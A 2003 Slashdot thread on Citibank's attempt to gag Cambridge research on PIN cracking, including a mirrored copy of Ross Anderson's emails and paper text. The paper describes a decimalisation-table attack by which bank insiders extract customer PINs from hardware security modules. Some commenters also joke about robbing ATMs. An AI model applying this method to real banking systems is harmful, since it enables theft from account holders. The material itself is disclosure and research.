Of course, this isn't necessarily the case. Note that this particular scheme would require a insider in the bank with access to the pin-verification system. Until somebody verifies that, or at least combs through the logs to look for patterns of suspicious PIN guessing, any connection between the increase in phantom withdrawals and this vulnerability is pure speculation.

A slashdotter that doesn't jump to conclusions and just start over-reacting? It's a miracle. :)

Yes, you're 100% correct.. there are more ways than one for a PIN to become public information. The general rise in card number trafficking I would think to be more to blame. Social engineering people out of their PINs is trivial compared to running this scheme with any long-term predictability.

Re:This is SERIOUS

[mosch]

Yes, Clinton may have lied about a question which shouldn't have been asked. Good thing we've brought honor to the whitehouse by selecting a president who'll kill for oil, who is starting a new mini-vietnam in the Phillipines, who is willing to put American lives in grave danger rather than allow the inspections to work, and who spent less investigating the whole of 9/11 than was spent investigating each individual inch of Clinton's penis.

Yep... thank god we got rid of that perjurous Clinton, now life is wonderful, what with our roaring economy, our feelings of comfort and safety at home and our fantastic new international reputation.

Re:This is SERIOUS

[Rip!ey]

Where are you that you have ATMs that pull in your card?
,br> Here in Australia it counts for almost all of them. The newer ones where you just swipe your card have only started to appear in the last 6 months or so.

Re:This is SERIOUS

Then look at Bush. Tells all kinds of stories about Iraq and Saddam Hussein that nobody is able to prove or even verify. Still threatens to throw bombs on him.

At the same time, throws no bombs on other country (Israel) that provably commits the same mistakes. Considers them his friends.

Strange guy, this Bush. Must be mentally insane.

Re:This is SERIOUS

[jedrek]

Look at Clinton. Almost certainly committed perjury.

It pretty much came to this:

Prosecutor: did you fuck around?
Clinton: (looks at wife) uhh... no.

Like it's been said before, I don't want a president who's stupid enough to say 'yes' when someone asks him that.

Re:This is SERIOUS

[sean23007]

Last I checked, it's significantly illegal to be less than honest with the courts.

Well, that depends on what your definition of the word "is" is. ;)

Re:This is SERIOUS

[Ambient+Sheep]

Where are you that you have ATMs that pull in your card?

In 18 years of using ATMs here in the U.K., I have ***never*** seen an ATM that *didn't* pull in your card. They all do here.

Amazed to hear of ones that don't, as I believe they tend to write back to the card a lot of the time (as a method of enforcing your daily limit offline), which isn't possible on a simple swipe machine.

Re:This is SERIOUS

[namespan]

I like Bush less than Clinton. Much less. I don't think that changes the fact that Clinton committed perjury when asked a question that, whether or not you believe SHOULD have been asked, legally could be and was asked. And should have been answered truthfully.

Again, no claim on my part that Bush is a better president, or even that he's a better person, or hasn't broken 15 laws. None of that is excuse for perjury. Nothing is.

Re:This is SERIOUS

[operagost]

Hi Alec Baldwin. So, when are you planning on leaving the country again?

atm pins

[syle]

I swear this is a duplicate from today but I can't find the original post. Am I going crazy?

Re:atm pins

[TheRaven64]

Am I going crazy?
Yes.

Re:atm pins

[terraformer]

Do you read bugtraq? It came out on there 2 days ago? Tom

Re:atm pins

You may have seen it on the Register. Most good stories appear there several hours before slashdot. I don't know if it's related to time zones or the fact that the register is run by real journalists...

Re:atm pins

[Hell+O'World]

I bet you are getting your K5 mixed up with your /.
Happens to me all the time. I almost submitted it here when I saw it there, but my last 4 submissions were are rejected :( so I didn't bother.

Re:atm pins

[damiam]

It was on k5, among other places.

Discussion over a donut and a coke at Citibank

Citibank CEO: "Guys, we need a new algorithm for our pin-codes. Our current 'pin-code-backwards'-encryption wasnt sufficient."

Germany Tech-boy: "I know one very strong. It's called brot13 and is is supposed to be very strong."

Another teccie: "Dude, its ROT13 and I have heard it is the strongest encryption algorithm ever. Good choice!"

Re:Discussion over a donut and a coke at Citibank

Oh fsck...its German, not Germany :) Maybe I ate too many donuts myself hehe

Re:Discussion over a donut and a coke at Citibank

Hail Deutschland !!! Was kann man heir getrinken?

Re:Discussion over a donut and a coke at Citibank

"Hey fun boys, GET A ROOM!"

Submission to /.

[prgammans]

So they submitted it to /. to gag it for them.
Much quicker then a court order.

Re:Submission to /.

[wirelessbuzzers]

Brilliant! Because if everyone is reading the article, nobody will be able to get through to... oh wait...

PINs can't work, only RSA will do.

We should teach our kids at school how to raise a 200-digit challenge number to a secret 200-digit power, modulo a 200-digit composite public key, all in their head. Then ATM machines could use this math to achieve secure authentication.

They Can't

[neurostar]

Tell 'em to prove it.

Well, as nice as it would be to have them prove the security, it is technically impossible to prove that a system is secure. It is only possible to prove that a system is not secure by exposing a flaw.

neurostar

Re:They Can't

[SquadBoy]

The parent poster of course knew this fact. :)

Now think for a minute about what s/he was trying to say. :)

Re:They Can't

[neurostar]

Ahhh ok. Hehe. Whoops!

neurostar

Re:They Can't

[TClevenger]

Well, as nice as it would be to have them prove the security, it is technically impossible to prove that a system is secure. It is only possible to prove that a system is not secure by exposing a flaw.

You mean, kinda like making the leader of a country prove that he doesn't have weapons of mass destruction?

(Yeah, kinda offtopic, but it proves the point.)

Re:They Can't

[Old+Wolf]

Rubbish. For example, you can prove mathematically that RSA is secure. You can do the same for other systems.

Re:They Can't

[wirelessbuzzers]

No. It hasn't even been proved that cracking RSA requires factoring, even with simplified assumpions about how you're going to be using it. And nobody knows whether tomorrow someone will solve factoring. You can't prove anything secure without P!=NP or some small-n approximation to that. A proof like that would be revolutionary.

More meat to the story

[UberLord]

http://www.theregister.co.uk/content/55/29425.html

The Register is running a story with more content

Which also explains in laymans terms how the two guys in the submitted link went about working out the vulnerability

Re:More meat to the story

[unicron]

The hell with content I say! This is Slashdot, we're all about sensationalist editorilizing!

Re:More meat to the story

[UberLord]

Really? And there was I thinking it was all about whoring karma by providing better links ;)

They should just give up...

[Llywelyn]

"Citibank is trying to get a gag order for new vulnerabilities found in the cryptographic equipment commonly used to protect the PINs of ATM transactions..."

Now that it has been posted on /. there are probably thousands of geeks downloading it as we speak. I think we can safely say that it is "in the wild"

ATM with an eye

[doubtless]

I believe that in some countries banks actually install a camera in every ATM they own. They simply take a video or a snapshot of the person making transaction with the machine.

I think this is pretty good idea to record frauds, false claims, and extortions in front of the machine. Personally I don't have a privacy issue in this case.

Re:ATM with an eye

[DragonMagic]

Except not every ATM is equipped with this, or, like those around here, when it gets really snowy, sometimes cars driving past the external ATMs can splash slush and salt onto the covering of the camera and block its view.

Probably the best thing to do is a complete overhaul of the CC, ATM and Debit Card markets, over the course of the next ten years or so. Increase the numbers to 24 digits, secure a pin of no less than six digits, and have complete address verification based on the entire address, country and postal code, instead of the absurdly simple address/postal code there is now.

It wouldn't be too difficult to supply most terminals with an update to software, and upgrade other pieces of software, to accept both types of cards until the old ones are phased out. And it wouldn't cost too much more money, since they're not replacing all the old cards, just phasing them out when new ones are released.

So why don't they?

Re:ATM with an eye

[Skyshadow]

I believe that in some countries banks actually install a camera in every ATM they own. They simply take a video or a snapshot of the person making transaction with the machine.

Most ATMs in the US are under video survailance, too.

Of course, this won't prevent me from using a techincal exploit to rob them. All I need to do is find an ATM in a somewhat secluded place (not hard), put on a ski mask just before I go to work and not take it off while I'm robbing the thing blind.

Cameras != protection from crime. They just assist in catching stupid criminals.

Re:ATM with an eye

Don't forget latex gloves and mirror shades. Cover up that license plate too, unless you're sure the second camera won't pick it up.

The footage probably would help me argue in court that the guy in the camera footage doesn't have my build, I don't own a car like that and I live nowhere remotely near the target ATM. That should be enough to get me off the hook for my lost funds.

Then when the bank is going over their employee records looking for the insider who compromised their security and happen to notice that your car looks a lot like the one in the video footage...

Re:ATM with an eye

[TBone]

That may be, but then you end up with someone who isn't you, who has your pin code, and is getting money from your account... Why, you must have given it to them! Because the systems are secure, right? He said/she said blah blah.

Re:ATM with an eye

[Cruciform]

But chances are they don't keep the video data long enough to protect the average customer until they see their bank statement.
If you're robbed at the ATM, chances are you'll report the crime as soon as you can, or if you're found lying in front of the ATM they'll check the tape right away.
But if the victim doesn't check their account balance regularly, they'll be waiting until statement time... and then it may be too late. The video will most likely be recorded over.

Re:ATM with an eye

[Old+Wolf]

You underestimate the unwashed. There are still people around who find the current ATMs scary.

How about a complete overhaul of IPv4 because we're running out of class B addresses? Answers:
- Not everyone agrees on the new protocol
- Can't co-ordinate mass switchover
- Nobody wants to pay for its development
- It's easier to introduce subnetting to avoid the problem

and so on and so forth. BTW 16 digits is good enough. The current system can have longer PINs phased in over time. A lot of the software and HSMs support PINs of up to 12 digits. Perhaps if one bank takes the initiative and upgrades their equipment to 6-digit PINs, customers will join that bank because of security. But perhaps more likely, they will not join it because 6 digits is harder to remember.

Changing software is not as easy in the banking world as it is in the PC world. Any code change has to be audited and approved by authorities, this can take months. Also, installing the new software has to be done in such a way that there is no downtime for the servers.

Re:ATM with an eye

Every Citibank branch I've been to in NYC does this.

Re:ATM with an eye

[(H)elix1]

Of course, this won't prevent me from using a techincal exploit to rob them. All I need to do is find an ATM in a somewhat secluded place (not hard), put on a ski mask just before I go to work and not take it off while I'm robbing the thing blind.

Or a well aimed laser-pointer while you rob a somewhat public ATM when it is blind....

Re:ATM with an eye

[rfmobile]

The cameras are only useful for recording a violent crime in front of the ATM - like a forced withdrawal at gunpoint. The videotape is retained for 48 hours and then re-used. Even if your monthly bank statement arrived the next day, it likely would not show such a recent transaction.

Re:ATM with an eye

The issue isn't with money being taken from an ATM using a stolen or bogus card. The theft is made by those inside the banks, skimming a little from different accounts

Credit please

[grub]

involving 'phantom' ATM transactions that users deny making but that banks still charge to customers accounts because they claim their systems are secure

"Honestly, Mr. Citibank Manager, why would I guy several cases of Fort Garry Ale or Guinness? I demand you credit my account.

Wrong hardware listed

[chiph]

These attacks defeat machines such as the Racal RG7000 and the IBM 4758/CCA which are commonly used to protect the PINs and keys used in automatic teller machines.

While the IBM 4758 has been cracked before, it's not something that someone can do on their lunch break. What I suspect is being cracked is the little desktop unit that the customer service rep spins around for you to enter your PIN when you sign up for ATM service.

Chip H.

Re:Wrong hardware listed

[Old+Wolf]

Who modded this as informative? If the poster had read the article, he would have seen that it is the bank servers (HSMs) that are being exploited.

Re:Wrong hardware listed

[weblogger]

There are case as described in other POST happening in Portugal, as our national news is reporting.

Anyone have details on Judd vs. Citibank?

[burgburgburg]

Since this is the case listed as establishing US law on phantom withdrawals, and is listed as a Citibank loss, anyone have further details?

Coincidence..., I think not.

[revery]

First there was the Phantom Menace, then there was the Phantom Edit, now we have "phantom" transactions... coindidence? I think not.

George Lucas is involved here somwhere.

--

I sense a great disturbance in the fiber, as if a million ATM transactions were suddenly silenced...

Re:Coincidence..., I think not.

that was pathetic.

Link to news story about this attack

[skintigh2]

http://www.theregister.co.uk/content/55/29425.html

Sorry, HTML formatting doesn't seem to be working...

to answer your questions

ATM send encrypted request asking CENTRAL server if it is OK to give you the amount of money you ask for. If yes then gives you money. Central server requests money from your bank when batch is run.
(By central server I don't mean there is only one, I mean that the ATM does not ask you back directly, it asks a machine that is owned and operated by the orginization that owns the ATM)

ATM lines are land lines.

Not exactly, there was a case of a man intercepting the transmission (hacking the land line) and telling the machine to empty itself. I'm not sure he got account numbers and pins or if he just told the machine to mechanically empty all the cash. He got caught and is probably still in jail. If you want to know for sure google for the case. I believe it was overseas. (The Netherlads somewhere maybe)

I do not believe there has been a case of remote comprimise of ATM machines.

Re:to answer your questions

there are built in machine level function is the diebold, and interbold machines that handle physical movements. These can be hacked by management access or local physical over rides and the machine can be made to go into 'test' mode and will happily empty out a cartridge of 20's :) I have to agree with the parent, I know of no network breaks of atm's but there are always the machine side intrusions. Physical access will override any sort of security given motivation and a little time.

There are some ATM's using secure satelite access, kind of like the iridium phone system, but those are rare...and in very specific high value area's and often temporary.

PINS based on acct. number??

[cayenne8]

I got from the paper, that this attack was somehow based on PINS originally coming from an encryption of the users acct. number?? I chose my PIN number when I set up my acct....not one assigned. Don't most banks let you choose your own PIN number?

Re:PINS based on acct. number??

[DragonMagic]

My bank, when you first open an account, chooses the password for you. But it's not just a hash of your account number or completely random, but it's the digits based on the telephone keypad letters of a four letter word, like BOTH, YOLK, THIS, etc.

Then in the menu of the ATM, once the card is activated by typing in this word, you can select your new PIN.

Re:PINS based on acct. number??

[IsThisNickTaken]

Unfortunately not. I asked my credit union when I opened a new account if I could specify the PIN and the answer was no. They claimed they were not equipped to handle it.

Now after reading this story, that may prove to be more than an inconvenience of having to memorize a new PIN.

Re:PINS based on acct. number??

[wirelessbuzzers]

My bank, when you first open an account, chooses the password for you. But it's not just a hash of your account number or completely random, but it's the digits based on the telephone keypad letters of a four letter word...

Hm. New possibilities for dictionary attacks on cards held by 15-year-olds come to mind...

Re:PINS based on acct. number??

[wirelessbuzzers]

Unfortunately not. I asked my credit union when I opened a new account if I could specify the PIN and the answer was no. They claimed they were not equipped to handle it.

What's your account number?

Re:PINS based on acct. number??

[ahem]

Your PIN gets automatically generated, then if you change it to something you like more, an offset is stored with your account number. The offset is the difference between the generated PIN and the number you chose.

palme999?

[Xipe66]

As a Swede, I'm supposed to trust someone calling himself Palme?

How about we got a link to the submitters profile so that we can value the content of his story in perspective of what he has written in the comments previously?

Not that I wouldn't trust a story like this normally, but I'm having some major trust issues with anyone _choosing_ a screen name that in any part contains the word "palme".

(For everyone to whom the word "palme" means nothing, Palme was the socialist prime minister of Sweden between 1969-1976 and 1982 to his assasination in 1986.)

Re:palme999?

[DaMa9eD]

Despite your error with the straw man...You should realize that there are more than one Palme in the world along with many unfortunate folks with the last name of Hitler....

Mirror (was: Re:in case of /.)

[cetan]

How about this:

http://www.phule.net/mirrors/pacc.htm

for formatting? :)

Go back to sleep children

[ralphus]

Everything is ok.

Your money is safe.

The world is simple.

You are with us or against us.

Go buy yourself something, you deserve it.

Those in charge know what they are doing and will take care of you.

Re:Go back to sleep children

[aussersterne]

Everything is ok.

Your money is safe.

The world is simple.

You are with us or against us.

Go buy yourself something, you deserve it.

Those in charge know what they are doing and will take care of you.

When I think about this, the fact that this post was modded as "insightful" by someone is perhaps the most frightening thing I've seen in a long time.

Re:Go back to sleep children

Did you say you sleep with children? Jacko? Is that you? Everything is ~not~ OK. My money is ~not~ safe. The world is ~not~ simple - but you are. Give me you bank acct number and I'll go buy myself something nice, after I crack your PIN;) What's the matter? If you really believed it, you'd publish your acct number, wouldn't you? Those is charge haven't a clue, and you know it! h

Re:Go back to sleep children

Of course he didn't believe it. He was obviously being sarcastic. And you are a mindless git for being too stupid to realize it.

Re:Go back to sleep children

[Dr+Caleb]

is perhaps the most frightening thing I've seen in a long time.

Then you have not been paying attention.

Think duct tape and plastic tarps.

Re:Go back to sleep children

[ralphus]

When I think about this, the fact that this post was modded as "insightful" by someone is perhaps the most frightening thing I've seen in a long time.

I agree. I'm frightened myself, and had a high level of sarcasm when I wrote it, but I feel that this basic sales pitch is done over and over again to the mass public and for the most part they buy it! The moderators probably picked up on that and agreed.

Re:Go back to sleep children

[waveman]

"It is OK if we do bad things, because we are good people".

Re:Go back to sleep children

[MarkGriz]

These aren't the droids you're looking for.

Re:Go back to sleep children

[sheddd]

Hmm at first I assumed this got ~3 +1 funny's and then some prankster gave it a +1 insightful as a joke... but I looked:

Totals: +4
50% Insightful
30% Interesting
20% Overrated

Crazy.

Re:Go back to sleep children

Then you have not been paying attention.

Think duct tape and plastic tarps.


He said frightening, not erotic...

Re:Go back to sleep children

I am frightened by the eroticism of duct tape.

Re:Go back to sleep children

[Lord+Sauron]

Iraq is more evil than North Korea George Bush will save us from this monster He is not interested in oil Slashdot has no dupes

Link to PDF

[FlyingCarrot]

Link to PDF given in page

Link to PDF

Old news

[MarkGriz]

A young John Connor figured out how to crack PINs way back in 1991. How is this "News" for Nerds?

Re:Old news

I thought his mom figured it out and showed him.

Re:Old news

I thought it was some guy his mom was sleeping with showed it to her, then she showed John.

Re:Old news

lol, whoever modded this "off-topic" obviously didnt read the link and realize he was trying to be "funny"

Re:Wouldn't have happened....

[doubtless]

Well, taken from http://www.sophos.com/support/faqs/savos2.html:

There are no OS/2 specific viruses in circulation but OS/2 computers can still be affected:

* Macro viruses that infect Word, Excel and other Windows mode applications can spread as usual.
* Boot sector viruses can affect the master boot sector, the OS/2 boot sector and the Boot Manager.
* DOS executable file viruses can run on OS/2 systems and infect other DOS executables.
* Any type of file can be stored on an OS/2 server and could infect a vulnerable workstation.

So yes, there are hacks that will affect OS/2, though they might not target OS/2 exclusively.

ATMs are fallible in lots of ways

[osgeek]

With no cash in my wallet, I went to an ATM (Wells Fargo) a few months ago. I withdrew $200, and went along my merry way.

I pulled out my wallet about an hour later. As I was thumbing through my cash to pay for something I discovered a ten dollar bill in the middle of my stack of twenties... HUH? Damned ATM machine ripped me off.

The next time I went by a Wells Fargo branch office, I reported the problem. They mentioned that there was some complicated method for submitting a complaint. I decided that it would cost me a lot more than $10 to try to get it back.

Re:ATMs are fallible in lots of ways

[PhilipMatarese]

Also, when you get a nice fresh stack of money, the 20s stick together. I tipped the pizza guy $24 instead of $4, but didn't notice it until the next day.

Dammit.

Re:ATMs are fallible in lots of ways

[Roofus]

That reminds me of the ATM where I asked for $20, and got $40 out instead. I checked my next statement to see how much it took out of my account, and it was $20! I guess I owe you and some other guy $10 each then huh?

Re:ATMs are fallible in lots of ways

[antiprime]

I had a similar experience, withdrew $200 and counted. The machine shorted me $20. So next time I was in the credit union, I mentioned it to a clerk. She looked up the transaction and said they had me on record as withdrawing $180, and that their ATM accounting is full of little checks and balances. I have never ever been given grief at a credit union when I questioned their ATM's accuracy. This is just one of many reasons to not deal with a large impersonal bank if you can help it. The folks at your local branch may be all personable, but when 'Corporate' barks an order from half a world away it's their job to snap to, even if it's not fair to the customers.

Re:ATMs are fallible in lots of ways

[cheezedawg]

When I was on vacation in Europe a few years back, I was unable to withdraw money from several ATMs one day (all of the ATMs gave error messages about not being able to verify the transaction or something). Finally, we found an ATM that worked, and we went on our merry way. When we got home, there were 3 ATM withdrawls that day for the same amount when only 1 of the transactions actually finished.

We wrote a letter to the bank, explained the situation, and a few days later they gave us a provisional credit for the extra transactions. About 2 months later we got a letter confirming that "errors" had occurred, and the provisional credit would stand.

Total time spent- 15 minutes. Total money spent- 1 postage stamp. Luckily we didn't bounce any checks because of it- that simplified the process.

Re:ATMs are fallible in lots of ways

[SamBeckett]

The same thing happened to me... except I did overdrawl my account.. The bank was nice enough (fucking bastards) to credit the money back to my account after about two months.. I wont mention any names but their initials are KEY BANK

Re:ATMs are fallible in lots of ways

[shotgunefx]

I got shorted $20 dollars once. Luckily I counted it in front of the ATM (which has a video, most here do) and got really pissed off.

I held it up and counted, like there was a little guy in there and started screaming at it. I went to my bank the next day, and the say they had to review it. A few days later they credited me. I assume one of the things they did was look at the tape.

Now I always count it in front of the camera so if there is a problem I've got proof.

Re:ATMs are fallible in lots of ways

[chhamilton]

Sometimes this works in your favor! I was withdrawing $40 from a CIBC (Canadian bank) ATM a few years ago, and out came $120! I double checked my bank statement, and it had only withdrawn $40.

In my case, I didn't bother to go and report the problem... ;)

Re:ATMs are fallible in lots of ways

Proof? You think that a blurry image of a acne-faced loser screaming at the camera is proof that you got ripped off?

Re:ATMs are fallible in lots of ways

[shotgunefx]

How dare you say I have acne! :P

But serious, yes I do. I don't think the cameras are blurry as they are AFAIK there to prove/disprove someone getting robbed at them. Because most people who get stuck up at one of them here are reimbursed. Also to get the license plate when trucks rip them out of the walls I imagine. Either way I got my money with no hassle. I also don't use those shitty 3rd party ATMs just the ones from the local banks.

Re:ATMs are fallible in lots of ways

[aafiske]

Huh. Well, for what it's worth, not all banks are so difficult to deal with. I once tried to withdraw $40 from an ATM. The little receipt that got printed out said '$40' and my account reflected $40 less, but I only got a single $20 bill.

I called up the bank and pointed this out, and they credited my account the next day for the $20 I was missing. (this was not a local bank or credit union, btw. This was a very large banking instituion.)

If only there was an effective way of determining if the bank is nice or not _before_ you open an account...

Re:ATMs are fallible in lots of ways

[cybercuzco]

Thats why I bank at Farmers State bank of Hamel (Hamel MN) Their "corporate office" is literally down the street from me, so if i ever have a problem, theyre very responsive (i know where most of the tellers live ;-) Small town banks genrally are more responsive and screw you less than the big guys. Fewer phone solicitations too. They also give out useful things like pot holders and spatulas every so often.

Re:ATMs are fallible in lots of ways

[Degrees]

No offense, but if you let them get away with it, there is no reason for them to fix the problem.... When I balance my monthly statement and find even a six cent error, I call them up and make them change it. Sure it cost them more to answer the phone than that. But, I want them to know that when they screw up with my money, I am going to complain. It would have just cost them less just to do it right the first time.

Why is this modded up?

[Dman33]

Informative? C'mon! I cannot read that. In fact, I stared at it cross-eyed and saw a sailship!

IMHO, I think that was just karma-whoring FP. Anyone else would have thought to hit the preview button. Please, if you are going to mirror or post the text, please preview and make sure it will not throw somebody into seizures...

Mirror: Formatted Correctly

[purduephotog]

Updated 20 February 2003

18 February 2003

To: ukcrypto@chiark.greenend.org.uk
Subject: Citibank tries to gag crypto bug disclosure
Date: Thu, 20 Feb 2003 09:57:34 +0000
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>

Citibank is trying to get an order in the High Court today gagging public disclosure of crypto vulnerabilities:

http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_g ag.pdf

I have written to the judge opposing the order:

http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_r esponse.pdf

The background is that my student Mike Bond has discovered some really horrendous vulnerabilities in the cryptographic equipment commonly used to protect the PINs used to identify customers to cash machines:

http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560 .pdf

These vulnerabilities mean that bank insiders can almost trivially find out the PINs of any or all customers. The discoveries happened while Mike
and I were working as expert witnesses on a `phantom withdrawal' case.

The vulnerabilities are also scientifically interesting:

http://cryptome.org/pacc.htm

For the last couple of years or so there has been a rising tide of phantoms. I get emails with increasing frequency from people all over the world whose banks have debited them for ATM withdrawals that they deny making. Banks in
many countries simply claim that their systems are secure and so the customers must be responsible. It now looks like some of these vulnerabilities have also been discovered by the bad guys. Our courts and regulators should make the banks fix their systems, rather than just lying about security and dumping the costs on the customers.

Curiously enough, Citi was also the bank in the case that set US law on phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's
an omen, if not a precedent ...
_____

Abstract

We present an attack on hardware security modules used by retail banks for the secure storage and verification of customer PINs in ATM (cash machine) infrastructures. By using adaptive decimalisation tables and guesses, the
maximum amount of information is learnt about the true PIN upon each guess.
It takes an average of 15 guesses to determine a four digit PIN using this technique, instead of the 5000 guesses intended. In a single 30 minute
lunch-break, an attacker can thus discover approximately 7000 PINs rather than 24 with the brute force method. With a $300 withdrawal limit per card, the potential bounty is raised from $7200 to $2.1 million and a single motivated attacker could withdraw $30{50 thousand of this each day. This attack thus presents a serious threat to bank security.

-- Mike Bond and Piotr Zielinski
Decimalisation table attacks for PIN cracking
February 2003

-----

From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
To: ukcrypto@chiark.greenend.org.uk
Subject: Yet another failure of commercial cryptographic equipment
Date: Tue, 18 Feb 2003 17:52:13 +0000

I gave a talk at Cambridge yesterday in which I described a new and interesting family of attacks on cryptographic equipment. These attacks defeat machines such as the Racal RG7000 and the IBM 4758/CCA which are commonly used to protect the PINs and keys used in automatic teller machines.

The paper is available online at:

http://research.microsoft.com/~aherbert/volume63.p df [4.8MB]

as pages 27-30 in the PDF. [HTML below]

I got a fax yesterday informing me that an application is to be brought in the High Court, it seems by Citibank, on Thursday 20th February for `relief in relation to the protection of nformation which they accept as being confidential and which ought not to be in the public domain.'

I hope that no English court would go so far as to censor already published material. However, one just can't tell these days ...

Protocol Analysis, Composability and Computation

Ross Anderson, Michael Bond

University of Cambridge, England

Security protocols early days

The study of security protocols has been associated with Roger Needham since 1978, when he published the seminal paper on the subject with Mike Schroeder [1]. The problem they investigated was how to distribute cryptographic keys in a network of computers. One solution is to have an authentication service with which all the principals share a key; then if Alice wants to chat with Bob (for example) she can call the service and get two encrypted messages containing the same session key one encrypted under the key she shares with the service so she can read it, and one encrypted under the key Bob
shares with the service so Bob can read it. She can now send the second of these to Bob to establish secure communication. The mechanism that Needham and Schroeder designed for this evolved into Kerberos, which is now part of Windows and is probably the most widely used of all uthentication protocols.

Security protocols are now embedded in a great many applications, but it is common to find unexpected bugs in them. For example, many banks used to encrypt each customers PIN using a key known to their ATMs and write it on the ATM card magnetic strip. The idea was to provide a limited service when the network was down. Years later, a villain discovered that the account number and the encrypted PIN were not linked: he could make up a bank card with his own encrypted PIN but someone elses account number, and loot their account. He went on to steal a lot of money, and once in prison wrote a manual telling everyone else how to do it too. The banks had to spend millions on changing their systems.

Clarifying the assumptions

Researchers started to gnaw away at the protocols described in the literature and found fault with essentially all of them. The failure to bind protocol elements was one frequent problem; another was that old messages could be
replayed. In the case of the original Needham-Schroeder protocol, for example, the freshness of the key generated by the server was guaranteed to only one of the principals. This was not necessarily an attack, as its inventors only
claimed to protect honest insiders from dishonest outsiders. However, it led to a debate about the assumptions underlying security protocol design.
Do we protect only against outsiders, or against insiders? Against the malicious, or the merely careless? For example, if we use timestamps to guarantee protocol freshness, are we vulnerable to principals who carelessly let their clocks
run slow? Do we only consider an attacker to have won if he can impersonate an authorised principal, or do we need to stop people abusing the protocol
mechanisms to perform a service denial attack?

The early attacks led to a second seminal paper, which Roger wrote with Mike Burrows and Martin Abadi in 1989 [2], and which introduced a logic of
authentication. This enables an analyst to formalise the assumptions and goals of a security protocol, and to attempt to prove its correctness. When a proof cannot be found, the place at which one gets stuck often shows where an attack can be mounted. This style of analysis turned out to be very powerful, and a large literature quickly developed in which the BAN Logic
and other formal tools were developed and extended to tackle a range of problems in protocol design.

One of the remarkable things about the study of security protocols is that they have not become a solved problem. One might think that managing the
objects associated with authenticating users over a network passwords, keys and the like was a fairly compact problem which would have been done to death within a few years. However, the more we dig, the more we find.

Since 1992, Roger has hosted a protocols workshop every Easter. Early events dwelled on matters of authentication and logic, but by the mid-90s, the growing interest in electronic commerce was yielding papers on mechanisms for micropayments, bets, streaming media, mobile communications and electronic voting. Later years brought work on PKI, trust management and copyright enforcement. More and more problems come along as more and more businesses reinvent themselves online; threat models have also become more realistic, with dishonest insiders displacing the mythical evil hacker on the Internet.

Dishonest insiders, and the composition problem

Over the last two years, we have been exploring exactly how one might re-engineer cryptography to cope with dishonest insiders. One conclusion is that the analysis of security protocols must be extended to application programming interfaces. This is because the crypto keys used in authentication and payment protocols are often kept in separate hardware security processors, or at least in cryptographic libraries, to which access can be restricted using physical or logical mechanisms. However, an interface has to be exposed to the application program, which will occasionally be suborned whether by a corrupt insider, or by malware. How much harm can be done, and how can we limit it?

Protecting protocols was hard enough, and yet the typical protocol consists of 35 messages exposed to manipulation. The API of a modern crypto library or hardware cryptoprocessor may contain 30500 callable functions, many with a range of options. This provides a very rich and complex environment for mischief.

Attacks often involve using two separate echanisms provided by the cryptoprocessor for different purposes, each of which could be innocuous by itself but which combine to cause trouble. For example, it is common to compute a customer PIN by encrypting the account number with a PIN
derivation key: the cryptoprocessor then returns the PIN encrypted with a PIN storage key, so that the application has no access to its clear
value. So far, so good. Then there is another transaction that can be used to encrypt a communications key under the terminal key loaded in an ATM. Here things start to go wrong, as the cryptoprocessor does not distinguish between a terminal key and a PIN derivation key; it considers them both to be of the same type. The upshot is that an attacker can supply the device
with an account number, claiming that it is a communications key, and ask for it to be encrypted under the PIN derivation key.

Attacks like this extend protocol analysis all the way to the composition problem the problem that connecting two systems that are secure in
isolation can give a composite system that leaks. This had previously been seen as a separate issue, tackled with different conceptual tools.

Differential protocol analysis

We are now working on the second generation of API attacks, which exploit the application syntax supported by the cryptographic service. These attacks are even more powerful, and at least as interesting from the scientific point of view. PIN generation provides a neat example here too. In more detail, the standard PIN computation involves writing the result of the encryption as a hex string and decimalising it. As some banks like to let customers change their PIN to a more memorable number, there is a provision to add an offset to give the PIN that the customer actually enters:
Account number: 8807 0123 4569 1715
PIN derivation key: FEFE FEFE FEFE FEFE
Encrypted account number: A2CE 126C 69AE C82D
Natural (decimalised) PIN: 0224
Offset: 6565
Customer PIN: 6789

The typical implementation requires the programmer to send the cryptoprocessor the account number, a table describing the decimalisation (here, 0123 4567 8901 2345) and the offset. The processor returns the PIN, encrypted under the PIN storage key. The designers do not seem to have realised that a crooked programmer can manipulate the decimalisation table and the offset as well as the account number. A multitude of attacks follow. For example, one can send in an account number with a decimalisation table of 1111...11 to find out the ciphertext corresponding to a clear PIN of 1111, and then with a decimalisation table of 0111...11 to see if there is a zero in the first four digits of the encrypted account number (if so, the PIN, and thus the ciphertext output, will be different). By manipulating the decimalisation table further,
he can get all the digits in the PIN, and by then playing with the offset he can get their order. In total, the attack requires only 1525
unprivileged cryptoprocessor transactions to discover the PIN on a single target account.

This second type of attack takes protocol analysis into yet another realm: that of differential attacks. Over the last ten years, a number of techniques have been invented for attacking cryptographic systems by bombarding them with inputs with chosen differences.

For example, in differential cryptanalysis, one analyses the changes in the output of the encryption algorithm; while with differential power analysis, one measures changes in the current consumption or electromagnetic emissions
of the equipment. Now we have examples of how consecutive runs of a protocol can leak information if the inputs are suitably chosen. The resulting differential protocol analysis appears to be very powerful against
application-level crypto.

It will take us some time to figure out the general lessons to be drawn from attacks like this, the robustness principles that designers should use to avoid them, and the analysis techniques that might assure us of a particular
designs soundness. The randomisation of all protocols (another feature of Rogers work) is likely to be important.

Quantitative analysis and multiparty computation

Various researchers have speculated about whether there might one day be a quantitative analysis of protocol security. This might be feasible for
PIN processing applications as we can measure the information leakage per transaction in terms of the reduction of entropy in the unknown PIN. This
leads in turn to a possible real-world application of an attack previously considered theoretical.

Gus Simmons wrote extensively on covert channels in protocols. One such channel that is always present is the balking channel when one of the principals in a protocol signals something by halting and refusing to continue. This is normally considered unimportant as its information capacity is only a third of a bit per transaction. But with systems designed to cope
with large transaction volumes, this need no longer hold. For example, a Trojanned cryptoprocessor could balk when it sees a redetermined PIN. If the PIN length were eight digits, this would be unlikely to hinder normal
operation, but at a thousand transactions a second, a programmer could quickly find a number in a typical nine-digit account number range with just this PIN, and open an account for it. Once this kind of problem is appreciated, one can start to look for attacks that involve inducing rare error conditions that cause the cryptoprocessor to abort a transaction. (They exist.)

A third emerging link is between protocol analysis and secure multiparty computation. In application-level crypto we may have several inputs to a computation, some of them coming from an untrusted source, and we have to
